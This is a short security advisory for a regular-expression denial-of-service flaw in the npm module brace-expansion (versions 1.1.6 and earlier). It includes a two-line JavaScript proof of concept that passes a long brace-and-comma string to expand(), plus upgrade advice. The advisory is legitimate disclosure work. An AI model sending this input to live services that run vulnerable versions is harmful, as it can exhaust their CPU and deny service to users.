ReDoS

Module: brace-expansion

Published: April 25th, 2017

Reported by: myvyang

CVE-NONE

CWE-400

Vulnerable: <=1.1.6
Patched: >=1.1.7

Overview

Affected versions of brace-expansion are vulnerable to a regular expression denial of service condition.

Proof of Concept

var expand = require('brace-expansion');
expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}');

Remediation

Update to version 1.1.7 or later.

References

Issue #33 PR #35 PR #35